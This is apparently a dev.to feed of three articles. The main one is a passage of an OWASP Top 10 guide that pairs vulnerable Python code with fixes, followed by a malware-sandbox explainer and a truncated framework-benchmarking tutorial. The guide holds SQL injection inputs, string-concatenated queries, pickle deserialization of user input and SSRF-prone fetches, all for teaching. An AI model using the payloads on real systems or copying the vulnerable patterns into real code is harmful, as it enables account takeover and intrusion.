<pre class="highlight python"><code><span class="c1"># Storing password in plain text? Ouch. </span><span class="n">user</span><span class="p">.</span><span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="sh">'</span><span class="s">password</span><span class="sh">'</span><span class="p">]</span> <span class="c1"># Or using MD5 (crackable in seconds) </span><span class="kn">import</span> <span class="n">hashlib</span> <span class="n">hashlib</span><span class="p">.</span><span class="nf">md5</span><span class="p">(</span><span class="n">password</span><span class="p">.</span><span class="nf">encode</span><span class="p">()).</span><span class="nf">hexdigest</span><span class="p">()</span> </code></pre> </div> <p>Fix — use strong, adaptive hashing (bcrypt, Argon2):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">bcrypt</span> <span class="kn">import</span> <span class="n">hashpw</span><span class="p">,</span> <span class="n">gensalt</span> <span class="n">hashed</span> <span class="o">=</span> <span class="nf">hashpw</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="sh">'</span><span class="s">password</span><span class="sh">'</span><span class="p">].</span><span class="nf">encode</span><span class="p">(),</span> <span class="nf">gensalt</span><span class="p">())</span> <span class="c1"># Store 'hashed' in DB. # Also enforce HTTPS everywhere – use HSTS header. </span></code></pre> </div> <blockquote> <p>Tool: sslscan for HTTPS config, hashcat to test weak password hashes.</p> </blockquote> <h2> A03: Injection (SQL, NoSQL, OS Command, LDAP…) </h2> <p>What it is: Attacker sends malicious input that gets interpreted as a command. Classic example: ' OR '1'='1 logging you in without a password.</p> <p>Vulnerable code (string concatenation):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">]</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="sh">'</span><span class="s">password</span><span class="sh">'</span><span class="p">]</span> <span class="n">query</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE name = </span><span class="sh">'</span><span class="si">{</span><span class="n">username</span><span class="si">}</span><span class="sh">'</span><span class="s"> AND pass = </span><span class="sh">'</span><span class="si">{</span><span class="n">password</span><span class="si">}</span><span class="sh">'"</span> <span class="c1"># Input: username = "admin' --" -&gt; bypasses password check! </span> </code></pre> </div> <p>Fix — use parameterized queries / ORM:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT * FROM users WHERE name = %s AND pass = %s</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span> <span class="p">)</span> <span class="c1"># Or use an ORM like SQLAlchemy which escapes automatically. </span></code></pre> </div> <blockquote> <p>Tool: sqlmap (automated detection) or Burp Scanner.</p> </blockquote> <h2> A04: Insecure Design </h2> <p>What it is: Flaws in the architecture or workflow — not a single line of code, but a design that makes security impossible. Example: a password reset that sends the new password by email (in plain text).</p> <p>Vulnerable design:<br> “Forgot password” emails your current password in plain text. That means the system stored it reversibly — huge risk.</p> <p>Fix — design with security in mind:</p> <ul> <li> Never store passwords reversibly.</li> <li> Password reset should send a time‑limited token (not a new password).</li> <li> Use threat modeling (e.g., STRIDE) before writing code.</li> </ul> <blockquote> <p>Tool: OWASP Threat Dragon for threat modeling diagrams.</p> </blockquote> <h2> A05: Security Misconfiguration </h2> <p>What it is: Default passwords, verbose error messages, unnecessary features enabled, missing security headers.</p> <p>Vulnerable example (Flask debug mode in production):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">app</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">debug</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="c1"># Shows full stack traces to attackers – exposes code! </span></code></pre> </div> <p>Fix — secure configuration:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Use environment variables </span><span class="kn">import</span> <span class="n">os</span> <span class="n">debug_mode</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">FLASK_DEBUG</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">False</span><span class="sh">'</span><span class="p">).</span><span class="nf">lower</span><span class="p">()</span> <span class="o">==</span> <span class="sh">'</span><span class="s">true</span><span class="sh">'</span> <span class="n">app</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">debug</span><span class="o">=</span><span class="n">debug_mode</span><span class="p">)</span> </code></pre> </div> <p>And add security headers:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.after_request</span> <span class="k">def</span> <span class="nf">add_security_headers</span><span class="p">(</span><span class="n">resp</span><span class="p">):</span> <span class="n">resp</span><span class="p">.</span><span class="n">headers</span><span class="p">[</span><span class="sh">'</span><span class="s">X-Content-Type-Options</span><span class="sh">'</span><span class="p">]</span> <span class="o">=</span> <span class="sh">'</span><span class="s">nosniff</span><span class="sh">'</span> <span class="n">resp</span><span class="p">.</span><span class="n">headers</span><span class="p">[</span><span class="sh">'</span><span class="s">X-Frame-Options</span><span class="sh">'</span><span class="p">]</span> <span class="o">=</span> <span class="sh">'</span><span class="s">DENY</span><span class="sh">'</span> <span class="n">resp</span><span class="p">.</span><span class="n">headers</span><span class="p">[</span><span class="sh">'</span><span class="s">Strict-Transport-Security</span><span class="sh">'</span><span class="p">]</span> <span class="o">=</span> <span class="sh">'</span><span class="s">max-age=31536000</span><span class="sh">'</span> <span class="k">return</span> <span class="n">resp</span> </code></pre> </div> <blockquote> <p>Tool: Nmap scripts for misconfig, OWASP ZAP passive scanner.</p> </blockquote> <h2> A06: Vulnerable and Outdated Components </h2> <p>What it is: You use a library like lodash or Flask with a known CVE (Common Vulnerability). Attackers scan for these.<br> Download the Medium app</p> <p>Vulnerable scenario:<br> Your requirements.txt has Flask==1.0.2 (released 2018 – many security fixes since). An attacker finds a public exploit for older Flask.</p> <p>Fix — keep dependencies updated:</p> <ul> <li> Run pip list --outdated regularly.</li> <li> Use Dependabot (GitHub) or Snyk to auto‑open PRs.</li> <li> Before installing a new package, check npm audit or safety check.</li> </ul> <blockquote> <p>Tool: OWASP Dependency-Check (free, scans for known vulnerabilities).</p> </blockquote> <h2> A07: Identification and Authentication Failures </h2> <p>What it is: Weak session management, no MFA, credential stuffing vulnerabilities, or session IDs in URLs.</p> <p>Vulnerable code (session in URL):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># http://example.com/profile?session_id=abc123 # Attacker steals this link – now they're logged in as you. </span></code></pre> </div> <p>Fix — use framework session management (secure flags):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">app</span><span class="p">.</span><span class="n">config</span><span class="p">.</span><span class="nf">update</span><span class="p">(</span> <span class="n">SESSION_COOKIE_SECURE</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="c1"># only over HTTPS </span> <span class="n">SESSION_COOKIE_HTTPONLY</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="c1"># no JavaScript access </span> <span class="n">SESSION_COOKIE_SAMESITE</span><span class="o">=</span><span class="sh">'</span><span class="s">Lax</span><span class="sh">'</span> <span class="p">)</span> <span class="c1"># Never put session in URL. </span></code></pre> </div> <p>Also enforce rate limiting on login attempts and offer MFA.</p> <blockquote> <p>Tool: hydra or ffuf for brute‑force testing.</p> </blockquote> <h2> A08: Software and Data Integrity Failures </h2> <p>What it is: You trust software or data from an untrusted source without verifying integrity. For example, downloading a dependency over HTTP (not HTTPS) or deserializing untrusted data.</p> <p>Vulnerable example (pickle deserialization in Python):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">pickle</span> <span class="n">data</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="sh">'</span><span class="s">user_data</span><span class="sh">'</span><span class="p">]</span> <span class="n">obj</span> <span class="o">=</span> <span class="n">pickle</span><span class="p">.</span><span class="nf">loads</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="c1"># Can execute arbitrary code! </span></code></pre> </div> <p>Fix — avoid pickle on untrusted input, use JSON with schema validation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code> <span class="kn">import</span> <span class="n">json</span> <span class="k">try</span><span class="p">:</span> <span class="n">obj</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="nf">loads</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="nf">isinstance</span><span class="p">(</span><span class="n">obj</span><span class="p">,</span> <span class="nb">dict</span><span class="p">)</span> <span class="ow">or</span> <span class="sh">'</span><span class="s">name</span><span class="sh">'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">obj</span><span class="p">:</span> <span class="k">raise</span> <span class="nb">ValueError</span> <span class="nf">except </span><span class="p">(</span><span class="n">json</span><span class="p">.</span><span class="n">JSONDecodeError</span><span class="p">,</span> <span class="nb">ValueError</span><span class="p">):</span> <span class="nf">abort</span><span class="p">(</span><span class="mi">400</span><span class="p">)</span> </code></pre> </div> <p>And pin dependency hashes (using pipenv or poetry) to prevent supply chain attacks.</p> <blockquote> <p>Tool: in-toto or Sigstore for integrity verification.</p> </blockquote> <h2> A09: Security Logging and Monitoring Failures </h2> <p>What it is: You don’t log attacks, or you log sensitive data, or you never monitor logs. So you only discover a breach months later (if ever).</p> <p>Vulnerable — no logging:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/login</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">login</span><span class="p">():</span> <span class="c1"># user logs in – but no record of failed attempts </span> <span class="bp">...</span> </code></pre> </div> <p>Fix — log security‑relevant events:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">logging</span> <span class="n">logging</span><span class="p">.</span><span class="nf">basicConfig</span><span class="p">(</span><span class="n">level</span><span class="o">=</span><span class="n">logging</span><span class="p">.</span><span class="n">INFO</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/login</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">login</span><span class="p">():</span> <span class="k">if</span> <span class="n">login_failed</span><span class="p">:</span> <span class="n">logging</span><span class="p">.</span><span class="nf">warning</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Failed login attempt for </span><span class="si">{</span><span class="n">username</span><span class="si">}</span><span class="s"> from </span><span class="si">{</span><span class="n">request</span><span class="p">.</span><span class="n">remote_addr</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="n">logging</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Successful login for </span><span class="si">{</span><span class="n">username</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p>Don’t log passwords or session tokens. Send logs to a central system (ELK, Splunk) and set up alerts for multiple failures.</p> <blockquote> <p>Tool: OWASP AppSensor — defines detection points.</p> </blockquote> <h2> A10: Server‑Side Request Forgery (SSRF) </h2> <p>What it is: Attacker makes your server send requests to internal systems (like <a href="http://localhost:8080/admin" rel="noopener noreferrer">http://localhost:8080/admin</a> or AWS metadata endpoint 169.254.169.254).</p> <p>Vulnerable code (fetching a user‑supplied URL):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">requests</span> <span class="n">url</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">webhook</span><span class="sh">'</span><span class="p">)</span> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="c1"># Can hit internal services! </span></code></pre> </div> <p>Fix — allowlist allowed domains / IPs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span> <span class="n">allowed_hosts</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">api.example.com</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">trusted-service.com</span><span class="sh">'</span><span class="p">]</span> <span class="n">parsed</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="k">if</span> <span class="n">parsed</span><span class="p">.</span><span class="n">hostname</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">allowed_hosts</span><span class="p">:</span> <span class="nf">abort</span><span class="p">(</span><span class="mi">400</span><span class="p">)</span> <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">5</span><span class="p">)</span> </code></pre> </div> <p>Better: use a separate internal firewall and disable HTTP redirects.</p> <blockquote> <p>Tool: SSRFmap (automated exploitation tool).</p> </blockquote> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmbwgrpxxfig2i12aju06.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmbwgrpxxfig2i12aju06.png" alt="Mahdi Shamlou" width="800" height="420"></a></p> <h2> How to Test Yourself (Hands‑On) </h2> <p>Reading about vulnerabilities isn’t enough — you need to practice.</p> <p>I recommend these free, safe environments:</p> <ul> <li> PortSwigger Web Security Academy — free labs for every OWASP Top 10 category.</li> <li> OWASP Juice Shop — an intentionally vulnerable web app you can run locally (in Docker) and hack.</li> <li> TryHackMe or HackTheBox — beginner rooms for web security.</li> </ul> <p>And remember the sandbox principle from my last article: always run unknown code or vulnerable apps inside isolated VMs (VirtualBox, VMware) or Docker containers. That way, even if you intentionally exploit a vulnerability, your main machine stays safe.</p> <h2> Want More? </h2> <p>If you enjoyed this practical security guide, you might also like:</p> <ul> <li> <a href="https://dev.to/mahdi0shamlou/what-is-a-sandbox-how-to-safely-run-and-analyze-any-unknown-exe-2m30"> What Is a Sandbox? How to Safely Run and Analyze Any Unknown .exe dynamic malware analysis for files.</a> </li> <li> <a href="https://dev.to/mahdi0shamlou/how-to-benchmark-web-frameworks-in-a-fair-isolated-way-mahdi-shamlou-1mol">How to Benchmark Web Frameworks in a Fair, Isolated Way performance testing without noise. </a> </li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fynkx482sihl7viur6p97.jpeg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fynkx482sihl7viur6p97.jpeg" alt="Mahdi Shamlou" width="800" height="1067"></a></p> <p>🔗 LinkedIn:<br> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a><br> 📱 Telegram:<br> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a><br> 📸 Instagram:<br> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p>Author: Mahdi Shamlou | مهدی شاملو</p> owasp security developer programming What Is a Sandbox? How to Safely Run and Analyze Any Unknown .exe | Mahdi Shamlou Mahdi SHamlou | مهدی شاملو Sun, 10 May 2026 09:00:43 +0000 https://dev.to/mahdi0shamlou/what-is-a-sandbox-how-to-safely-run-and-analyze-any-unknown-exe-2m30 https://dev.to/mahdi0shamlou/what-is-a-sandbox-how-to-safely-run-and-analyze-any-unknown-exe-2m30 <p>Hi, <strong><a href="https://dev.to/mahdi0shamlou">Mahdi Shamlou</a></strong> here. In this guide, I explain how malware analysis sandboxes work — from isolating an unknown .exe in a virtual machine to hooking Windows APIs and generating a behavior report. I also cover open‑source tools like Cuckoo and CAPE so you can safely detonate suspicious files without risking your real PC.</p> <p>You just downloaded a free PDF converter from a random forum. It’s an .exe file. The website looked legit, but... you're not 100% sure. You want to see what this program actually does when it runs. But running it directly on your own PC could cost you everything.</p> <p>What you need is a sandbox.</p> <p>In this article, I’ll explain what a sandbox is, why you need one, and exactly how it works behind the scenes to analyze an unknown executable and give you a full report.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhdfshuamy84pz8sys0u8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhdfshuamy84pz8sys0u8.png" alt="Mahdi Shamlou" width="623" height="600"></a></p> <h2> What Exactly Is a Sandbox? </h2> <p>In cybersecurity, a sandbox is a security mechanism for separating running programs. It is often used to execute untested code, or untrusted programs from unverified third-parties, suppliers, untrusted users and untrusted websites.</p> <p>Think of it as a controlled, isolated environment where you can execute a suspicious file or piece of code without risking harm to your real operating system or personal files. It’s your digital quarantine zone where you can safely “detonate” a suspicious program to see what it does.</p> <h2> Where Do We Use a Sandbox? </h2> <p>The primary use case, and the one we’re focusing on today, is malware analysis:</p> <p>To run and test an unknown .exe file: When you have a potentially malicious executable, you don’t want to run it on your main machine. A sandbox provides the safe, isolated space to execute it, observe its behavior, and determine if it’s harmful.</p> <p>Security professionals use sandboxes to analyze suspicious objects in a Virtual Machine (VM) with a fully-featured operating system, detecting the object’s malicious activity by analyzing its behavior. This is known as dynamic analysis: instead of just looking at the file’s code (static analysis), you run the code and monitor its actions in real-time.</p> <h2> How a Malware Analysis Sandbox Works </h2> <p>The process for analyzing an unknown .exe generally follows this straightforward workflow:</p> <p><strong>1. You Submit the Input File</strong>. You, the user, give the sandbox the suspicious .exe file as the input.</p> <p><strong>2. The Sandbox Isolates the File in a Virtual Machine (VM).</strong> The sandbox system moves the file into a secure, isolated virtual machine environment. This is the “blast-proof chamber” where the analysis will take place. For each analysis, a fresh and isolated virtual machine can be launched to ensure nothing from a previous test contaminates the current one.</p> <p><strong>3. The Analysis Begins (The File Is Executed).</strong> The sandbox automatically runs (or detonates) the suspicious file inside this safe environment.</p> <p><strong>4. The Sandbox Analyzes Its Behavior.</strong> While the unknown executable runs, the sandbox meticulously monitors all of its system-level activity. It’s watching for:</p> <ul> <li> <strong>File System Changes</strong>: What files or folders does it create, modify, or delete?</li> <li> <strong>Process Creations</strong>: Does it try to launch other hidden processes?</li> <li> <strong>Registry Modifications (on Windows)</strong>: Does it change critical system settings for persistence?</li> <li> <strong>Network Traffic</strong>: Does it try to “phone home” to a command-and-control server?</li> </ul> <p><strong>You Get the Results.</strong> After the analysis finishes, the sandbox compiles everything it observed into a detailed report for you. You can then review the report to determine if the file is malicious and understand exactly what it would have tried to do on your real system.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft1tv3n1jyhcdiqz2dijh.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft1tv3n1jyhcdiqz2dijh.png" alt="Mahdi Shamlou" width="800" height="420"></a></p> <h2> How Sandboxes Hook APIs </h2> <p>So, how does a sandbox actually see everything a program is doing? This is the technical secret.</p> <p>When a running program wants to perform any action on your computer — like opening a file (CreateFile), sending data over the network, or creating a new process it makes a request to the Windows API. A malware analysis sandbox intercepts these requests using a technique called API hooking.</p> <p><strong>It works like this</strong>: the sandbox injects a small piece of code (a “hook”) into the program’s memory. This hook effectively reroutes the program’s API calls. When the suspicious program calls CreateFile to open a file, it doesn't go directly to the operating system. Instead, it is intercepted and redirected to the sandbox's own monitoring function. The sandbox logs all the details (e.g., a request to open "C:\Users\Admin\Documents\passwords.txt") and then, for true stealth analysis, passes the original call along to the real operating system so the malware's execution is not blocked. This allows the sandbox to see literally every single interaction the malware has with the operating system.</p> <h2> Open-Source Sandboxes: Cuckoo and CAPE </h2> <p>If you want to try this yourself, open-source tools are the way to go. Two of the most powerful and well-known platforms are Cuckoo and CAPE.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqwh9mnr5g0qqv08s8rew.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqwh9mnr5g0qqv08s8rew.jpg" alt="Mahdi Shamlou" width="800" height="400"></a></p> <ul> <li> <strong><a href="https://github.com/cuckoosandbox/cuckoo" rel="noopener noreferrer">Cuckoo Sandbox</a></strong>: This is the original, open-source automated malware analysis system. It safely executes and analyzes potentially malicious files in an isolated virtual machine and provides detailed reports on their behavior. It’s the foundation for many modern sandboxes.</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqwspe3ce3u0vd9tt1jmq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqwspe3ce3u0vd9tt1jmq.png" alt="Mahdi Shamlou" width="800" height="221"></a></p> <ul> <li> <strong><a href="https://github.com/kevoreilly/CAPEv2" rel="noopener noreferrer">CAPE Sandbox (CAPEv2)</a></strong>: CAPE (Config And Payload Extraction) began as a powerful fork of Cuckoo and is now the active, maintained successor to the original project. Its main goals are to add automated malware unpacking and configuration extraction. This is crucial because modern malware often uses “packers” to compress or encrypt its malicious code, making it harder to analyze. CAPE automates the process of unpacking it to see its real behavior.</li> </ul> <p>CAPE is the best choice today because, unlike the original Cuckoo (which is no longer actively maintained), CAPE continues to improve and is the only remaining, actively supported open-source sandbox based on the original Cuckoo codebase.</p> <h2> Final Thoughts </h2> <p>A sandbox gives you a safe space to answer the ultimate question: “What will this .exe do if I run it?" It's an indispensable tool for anyone who downloads software from the internet. And with powerful, open-source platforms like CAPE, you have enterprise-grade malware analysis power available right on your own machine for free.</p> <p>If you’d like to get your hands dirty with Cuckoo Sandbox (the original, foundational project), check out this practical walkthrough:</p> <p><a href="https://medium.com/@easypeazyo14/malware-analysis-using-cuckoo-sandbox-756616e6e85e" rel="noopener noreferrer">🔗 Malware Analysis Using Cuckoo Sandbox — Step by Step Guide</a></p> <p>hat article covers installation, configuration, and running your first analysis.</p> <p>Have you ever run an unknown .exe in a sandbox? What tool did you use — Cuckoo, CAPE, or something else? Let me know in the comments.</p> <h2> Want More? </h2> <p>If you enjoyed this deep dive, you might like my other article:</p> <p>If you’re interested in real-world, isolated benchmarking and want to see how different web frameworks (FastAPI, Flask, etc.) perform under controlled conditions, you might like this practical guide:</p> <p><a href="https://dev.to/mahdi0shamlou/how-to-benchmark-web-frameworks-in-a-fair-isolated-way-mahdi-shamlou-1mol">How to Benchmark Web Frameworks in a Fair, Isolated Way | Mahdi Shamlou</a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fynkx482sihl7viur6p97.jpeg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fynkx482sihl7viur6p97.jpeg" alt="Mahdi Shamlou" width="800" height="1067"></a></p> <p>🔗 LinkedIn:<br> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a><br> 📱 Telegram:<br> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a><br> 📸 Instagram:<br> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p>Author: Mahdi Shamlou | مهدی شاملو</p> security programming sandbox software How to Benchmark Web Frameworks in a Fair, Isolated Way | Mahdi Shamlou Mahdi SHamlou | مهدی شاملو Sat, 21 Feb 2026 20:39:44 +0000 https://dev.to/mahdi0shamlou/how-to-benchmark-web-frameworks-in-a-fair-isolated-way-mahdi-shamlou-1mol https://dev.to/mahdi0shamlou/how-to-benchmark-web-frameworks-in-a-fair-isolated-way-mahdi-shamlou-1mol <p>Hey everyone! Mahdi Shamlou here 👋 </p> <p>I’ve seen many posts online comparing web frameworks, but most of them are either <strong>biased, outdated, or hard to reproduce</strong>. </p> <p>So I wanted to share a <strong>practical way to benchmark any web framework</strong>, keeping everything <strong>isolated, fair, and reproducible</strong>. </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7csp2k2kv7c6oszg67m5.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7csp2k2kv7c6oszg67m5.png" alt="Mahdi Shamlou" width="800" height="533"></a></p> <p>We’ll use <strong>Docker</strong> for isolation, <strong>k6</strong> for load testing, and <strong>Python frameworks</strong> — FastAPI and Flask — as simple examples. But the approach works for <strong>Node.js, Go, Java, Rust, or anything else</strong>. </p> <h2> Why Isolated Benchmarking Matters </h2> <p>Benchmarking web frameworks can be tricky. Many factors affect results:</p> <ul> <li>CPU &amp; memory availability </li> <li>Number of workers / threads </li> <li>Background processes </li> <li>Routing, logging, database, I/O </li> </ul> <p>To make a fair comparison, you need:</p> <ol> <li> <strong>Docker containers</strong> with fixed CPU &amp; memory </li> <li> <strong>Identical routes</strong> or endpoints in each framework </li> <li> <strong>Controlled load tests</strong> using k6 or similar tools </li> <li> <strong>Results saved</strong> for later analysis </li> </ol> <h2> Step 1 — Project Structure </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">mkdir </span>web_framework_benchmarks <span class="nb">cd </span>web_framework_benchmarks <span class="nb">mkdir </span>framework1 framework2 k6-tests results </code></pre> </div> <p>You can replace framework1 and framework2 with any frameworks you want to compare.</p> <h2> Step 2 — Sample API Route </h2> <p>For demonstration, we use a simple /hello endpoint.</p> <p>Python Example (FastAPI):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/hello</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">hello</span><span class="p">():</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">hello world</span><span class="sh">"</span><span class="p">}</span> </code></pre> </div> <p>Python Example (Flask):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">jsonify</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/hello</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">hello</span><span class="p">():</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">message</span><span 